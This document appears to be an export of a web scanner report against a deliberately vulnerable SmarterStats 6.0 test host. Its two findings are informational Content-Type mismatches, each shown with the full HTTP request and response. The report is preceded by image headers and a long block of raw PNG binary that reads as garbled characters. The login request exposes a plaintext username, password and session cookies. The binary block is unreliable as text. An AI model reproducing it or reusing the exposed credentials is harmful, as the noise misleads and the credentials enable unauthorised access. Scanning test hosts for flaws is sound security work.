ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.60. http://vulnerable.smarterstats.6.0.host:9999/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /default.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /default.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}
Content-Length: 472

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=AdminSettings%7C%2FAdmin%2FfrmGeneralSettings.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA%3D%3D&ctl00%24Split%24LP%24SessionKey=17bab76dde4a45b8a2b4b99fa9615040&ctl00%24PageTitle=Sites&ctl00%24PanelLoadedState=%7B%7D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:30 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8999

1|#||4|5869|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Settings
           </div>
       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuSN' name='ctl00$Split$LP$ctl01$menuSN' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_b7d0be11cb2e4d8580fc0da2775a920f' style='z-index: 800'><a class='hmA' href='#'>New Site</a></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_063c2211e3354b5080f77dacfc30e70c' style='z-index: 800'><a class='hmA' href='#'>New Server</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>
<div class='hmClear'><!-- --></div>

</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
<div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeNav'>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0' TTUID="NAVGeneralSettings" TTUID="treeGeneralSettings" >
       <div class='htvLineFirst'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/settings.gif' /><a class='htvA' href='#'>General Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1' TTUID="NAVEmailSettings" TTUID="treeEmailSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/PopRetrieval.gif' /><a class='htvA' href='#'>Email Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv2' TTUID="NAVExtensionSettings" TTUID="treeExtensionSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/TicketsInQueue.gif' /><a class='htvA' href='#'>Extension Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv3' TTUID="NAVReportSettings" TTUID="treeReportSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/reports.gif' /><a class='htvA' href='#'>Report Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4' TTUID="NAVDefaults" TTUID="treeDefaults" >
       <div class='htvLine'>
           <span class='htvToggle htvExpanded'></span>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Defaults</a>
       </div>
       <ul class='htvSub' style='display:block;'>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv0' Requires="ENTERPRISE" TTUID="NAVDefaultsServerDefaults" TTUID="treeDefaultsServerDefaults" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domain.gif' /><a class='htvA' href='#'>Server Defaults</a>
               </div>
           </li>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv1' Requires="ENTERPRISE" TTUID="NAVDefaultsServerPropagation" TTUID="treeDefaultsServerPropagation" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Propagation.gif' /><a class='htvA' href='#'>Server Propagation</a>
               </div>
           </li>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv2' TTUID="NAVDefaultsSiteDefaults" TTUID="treeDefaultsSiteDefaults" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domain.gif' /><a class='htvA' href='#'>Site Defaults</a>
               </div>
           </li>
           <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv3' TTUID="NAVDefaultsSitePropagation" TTUID="treeDefaultsSitePropagation" >
               <div class='htvLineLast'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Propagation.gif' /><a class='htvA' href='#'>Site Propagation</a>
               </div>
           </li>
       </ul>
   </li>
   <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv5' TTUID="NAVActivation" TTUID="treeActivation" >
       <div class='htvLineLast'>
           <span class='htvToggle htvExpanded'></span>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Activation</a>
       </div>
       <ul class='htvSub' style='display:block;'>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv5_htv0' TTUID="NAVActivationLicensing" TTUID="treeActivationLicensing" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/private.gif' /><a class='htvA' href='#'>Licensing</a>
               </div>
           </li>
           <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv5_htv1' ClientSideCommand="GenericPopup&#x28;&#x22;&#x22;&#x2c;&#x20;&#x22;CheckupWindow&#x22;&#x2c;&#x20;&#x22;width&#x3d;700&#x2c;height&#x3d;850&#x2c;resizable&#x3d;no&#x2c;scrollbars&#x3d;yes&#x2c;status&#x3d;no&#x2c;toolbar&#x3d;no&#x22;&#x29;&#x3b;" TTUID="NAVActivationAdminDiagnostic" TTUID="treeActivationAdminDiagnostic" >
               <div class='htvLineLast'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Status_Diagnostic.gif' /><a class='htvA' href='#'>Self Diagnostic</a>
               </div>
           </li>
       </ul>
   </li>
</ul></div>

</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
</div>

|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||124|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA==|25|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate,|0|postBackControlIDs|||35|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1,|0|childUpdatePanelIDs|||34|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1,|2|asyncPostBackTimeout||90|12|formAction||default.aspx|5|pageTitle||Sites|90|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\tif (self.ResizeLeftBar) ResizeLeftBar();\r\n\t","type":"text/javascript"}|20|scriptStartupBlock|ScriptContentNoTags|ClearTreeToggle();
|20|scriptStartupBlock|ScriptContentNoTags|SidebarAjaxLoaded();|43|scriptStartupBlock|ScriptContentNoTags|if (self.LeftBarReady) self.LeftBarReady();|589|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_menuSN').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuSN_menuGlobalNew":"return false;","ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_b7d0be11cb2e4d8580fc0da2775a920f":"OpenNewMessage(\u0027/Admin/frmSite.aspx\u0027, 800, 600); return false;","ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_063c2211e3354b5080f77dacfc30e70c":"OpenNewMessage(\u0027/Admin/frmServer.aspx\u0027, 600, 400); return false;"},"ClientCallbacks":{}}); });
|1426|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_treeNav').hyperTreeView({"imagePath":"/App_Themes/Default/Images/16x16/","NoLines":false,"ContextMenuID":null,"FunctionMap":{"ctl00_Split_LP_ctl01_treeNav_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmGeneralSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmEmailReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv2":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmExtensionSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv3":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmServerDefaults\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv1":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmServerPropagation\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv2":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmDefaultSiteSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv3":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmSitePropagation\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv5_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmLicenseManager\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv5_htv1":"OpenDiagnostic(\u0027/Admin/frmSelfDiagnostic.aspx\u0027); return false;"},"ClientCallbacks":{"onExpand":"RecordTreeExpanded","onCollapse":"RecordTreeCollapsed"}}); });
|83|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_treeNav_htv0').selectHyperTreeNode(); });
|

10.61. http://vulnerable.smarterstats.6.0.host:9999/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/login.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=
Content-Length: 921

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=&ctl00%24MPH%24txtUserName=hoytnet&ctl00%24MPH%24txtPassword=LL12345&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:34:15 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:34:14 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5845

1|#||4|3934|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Please enter your Site ID. The Site ID is the number assigned to the particular site you are trying to login to.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="hoytnet" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
   <option selected="selected" value="">Use Browser Language</option>
   <option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
